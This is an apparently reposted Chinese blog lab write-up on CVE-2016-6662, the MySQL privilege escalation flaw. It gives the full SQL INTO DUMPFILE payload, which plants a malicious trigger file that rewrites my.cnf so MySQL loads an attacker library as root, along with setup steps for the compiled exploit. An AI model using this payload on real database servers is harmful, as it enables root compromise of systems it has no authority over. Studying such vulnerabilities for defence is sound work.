　　　　　　　　cve-2016-6662 MYSQL提權分析

MySQL  <= 5.7.15       遠程代碼執行/ 提權 (0day)
        5.6.33
        5.5.52

Mysql分支的版本也受影響,包括：
    MariaDB
    PerconaDB
創建bob用戶，並賦予file，select，insert權限，創建用於實驗的數據庫activedb和表active_table

將exp先寫入tmp目錄，並編譯成so文件，需要修改一下ip，port和my.cnf的位置

select "TYPE=TRIGGERS\ntriggers='CREATE DEFINER=`root`@`localhost` TRIGGER active_table\nAFTER INSERT\n   ON `active_table` FOR EACH ROW\nBEGIN\n   DECLARE void varchar(550);\n   set global general_log_file=\\\'/etc/mysql/my.cnf\\\';\n   set global general_log = on;\n   select \"\n[mysqld]\nmalloc_lib=\\\'/tmp/mysql_hookandroot_lib.so\\\'\n\" INTO void;   \n   set global general_log = off;\nEND'\nsql_modes=1073741824\ndefiners='root@localhost'\nclient_cs_names='latin1'\nconnection_cl_names='latin1_swedish_ci'\ndb_cl_names='latin1_swedish_ci'" into dumpfile '/var/lib/mysql/activedb/active_table.TRG';

發現可寫的my.cnf會被忽略？？？不知道為什么（難道打補丁了？），不知道5.5的情況會怎么樣，所以先把my.cnf的權限改回來744

文章轉發至：http://blog.0kami.cn/2016/09/18/cve-2016-6663-mysql-exp/

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 windows提權方法 mysql的MOF和UDF提權 Mysql的寫馬與提權 MySQL提權之udf提權(無webshell的情況) windows+MYSQL+UDF提權 MySQL數據庫提權（一） Android　應用簽名提權方法 linux提權方法(不斷總結更新) 三個給進程提權的方法（c/cpp） linux提權方法（不斷更新）